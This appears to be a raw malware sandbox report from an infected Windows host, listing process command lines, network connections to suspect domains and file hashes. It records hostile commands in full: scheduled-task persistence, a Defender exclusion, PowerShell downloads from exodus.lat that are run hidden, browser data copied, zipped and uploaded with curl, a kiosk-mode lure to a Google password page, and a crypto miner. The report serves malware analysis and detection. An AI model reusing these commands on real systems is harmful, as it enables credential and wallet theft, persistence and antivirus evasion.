cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1652

C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe

"C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe"

C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe

"C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1964 -prefMapHandle 1956 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f03138-6534-469c-8f21-5220d70f3425} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9b937f-b66b-4cc9-a25d-ce5d9d590e9a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d9752fd-55e6-47e9-b2d7-aad876e04da4} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c0a44d-dba6-499e-8750-28083730bc69} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4af03d6e-1024-4cb8-ab8e-fbff5239d5a3} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" utility

C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe

"C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89a3350a-4d71-49fb-ae2d-0bb5475aadd7} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5380 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e83fb09-95a2-42b0-b296-22cf085bf81a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5588 -prefMapHandle 5592 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0e71c56-2449-4833-8005-4cf322f47822} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe

"C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Users\Admin\AppData\Local\asm\mi.exe

"C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 8.8.8.8:53 166.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 153.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 167.136.67.172.in-addr.arpa udp
US 8.8.8.8:53 96.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 74.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 ratiomun.cyou udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 156.43.21.104.in-addr.arpa udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 246.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 104.21.35.246:443 print-vexer.biz tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 104.21.81.153:443 se-blurry.biz tcp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 172.67.206.64:443 covery-mover.biz tcp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 104.21.35.246:443 print-vexer.biz tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
RU 185.215.113.206:80 185.215.113.206 tcp
N/A 127.0.0.1:58570 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
GB 216.58.213.14:443 youtube.com tcp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 216.58.213.14:443 youtube.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 164.237.32.52.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 142.250.200.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 211.38.74.45.in-addr.arpa udp
NL 92.63.197.221:80 92.63.197.221 tcp
N/A 127.0.0.1:58578 tcp
US 8.8.8.8:53 221.197.63.92.in-addr.arpa udp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.35:80 c.pki.goog tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 cdn-downloads.com udp
NL 203.161.45.11:443 cdn-downloads.com tcp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.106:80 r11.o.lencr.org tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 106.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
GB 142.250.200.14:443 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com tcp
RU 188.119.66.185:443 188.119.66.185 tcp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
NL 31.214.157.206:2024 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 206.157.214.31.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

MD5 08b1c924756ba9d72d0a3920d9b6378e
SHA1 7fc26d76ef9928fb3ef08223bbcecd0b53d0e43d
SHA256 e599f6a0e9fd997d4a4c027a36fe1125c8280925692889ad5be8e24206992a53
SHA512 df3cf9e9034fa7d69f7db6ebd43e378dc4e084c1df8242ac7fa710bd1181bdca042fe044b0903e9ccaeb61e5420ac7f349ab88a858aba889ac300678e5c6363b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe

MD5 d9e5b3e60c19b797259b97ef6e32f5aa
SHA1 7ed4d22371345fb3865c05b4875a8bd9c67fe402
SHA256 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e
SHA512 f7a505900f13d7f6670dd8801da2d61c0eb0d6f1c23f84a5147d667eb9a74a514ade6d3982a6583fbf3b9d6e6d143402902cbf763957c40aedb28e26c2543b2d

memory/1848-14-0x0000000000380000-0x0000000000822000-memory.dmp

memory/1848-15-0x0000000077814000-0x0000000077816000-memory.dmp

memory/1848-16-0x0000000000381000-0x00000000003AF000-memory.dmp

memory/1848-17-0x0000000000380000-0x0000000000822000-memory.dmp

memory/1848-18-0x0000000000380000-0x0000000000822000-memory.dmp

memory/1848-32-0x0000000000380000-0x0000000000822000-memory.dmp

memory/2564-30-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe

MD5 dce58ab08c3ab155903b939602299862
SHA1 8de86054f3bb235caa32ce7121760ff2b1477b45
SHA256 1a0bdc949fba81cad9505e074d506b5c9c60d46afc52a785962529eb12984650
SHA512 b752e15b2c2f5e8e826aab3834c84a91da55735d3a052baf362eef388b874830bb6b5ed784b13eb3cfc6d451181991491198a3666187faf79b9c27142235cea9

memory/2904-36-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

MD5 ff4cf493ac5f7663d1cfc243e6646eb7
SHA1 ff7184eae695580f1e86fac340925c7f01f4de6d
SHA256 72a99a945b705fc1c8fa59c3db6810be2aadeaecc34f954f5ab314574002d748
SHA512 1eef407d5bfa8b94bb98cb0a64e7c73cb94176507fa924642c6cf21192965ba8856390214379fddf192b88e19377768ead94fb4d393831e47ca230b6b168f14b

memory/4764-52-0x0000000000B20000-0x0000000000FAB000-memory.dmp

memory/2564-53-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

MD5 3a16d0e4e4522073da3c8a5a9f9e790b
SHA1 7a42a21a348d2e49c67b426d333a5c354ed2c83e
SHA256 ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e
SHA512 1213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a

memory/2068-72-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp

MD5 e672d5907f1ce471d9784df64d8a306b
SHA1 6d094cae150d72b587c5480c15127d7059e16932
SHA256 9f9250be71bd6254790a9630990f4560d53995db3d8737b7f49986e3551283e5
SHA512 9cf10e997d8d99e6eb2f6ccac00ab365f63e03d96c2e2354fdf67683b85553a60cd9542cfb21cbea468c6a2bda454cde71937c0d21c4b738451b5e2c30690c39

memory/2564-78-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2904-79-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N55LT.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2904-88-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

MD5 b466bf1dc60388a22cb73be01ca6bf57
SHA1 21eb9665e42d6c4a8d9e764627049b2a6e3a69a4
SHA256 e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad
SHA512 6cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/1888-116-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1888-119-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2904-120-0x0000000000B60000-0x0000000000FEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe

MD5 69028d86ffdb8a59a9127b47dfb0ab38
SHA1 22d638c41ec4e8edfbb24d6ef6ccde318b581b84
SHA256 c006fc45ccd90fd47319f6aa0ee4694d8b17e4fd35b237ada54db1cc649b0367
SHA512 dbb7a989466b49646b44a0635a22188eba4139b57f7308753b6a1fb233f7f3c7a1fac91de399bb40115bb1a4a816caf789c318c44dfcabce8ef16958f11dceb6

memory/1912-124-0x0000000000390000-0x0000000000A30000-memory.dmp

memory/4764-125-0x0000000000B20000-0x0000000000FAB000-memory.dmp

memory/4764-128-0x0000000000B20000-0x0000000000FAB000-memory.dmp

memory/1912-129-0x0000000000390000-0x0000000000A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

memory/412-157-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Audit.cmd

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

memory/412-190-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2068-353-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2564-352-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1988-433-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/1888-434-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/1500-458-0x0000000000F30000-0x00000000013BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
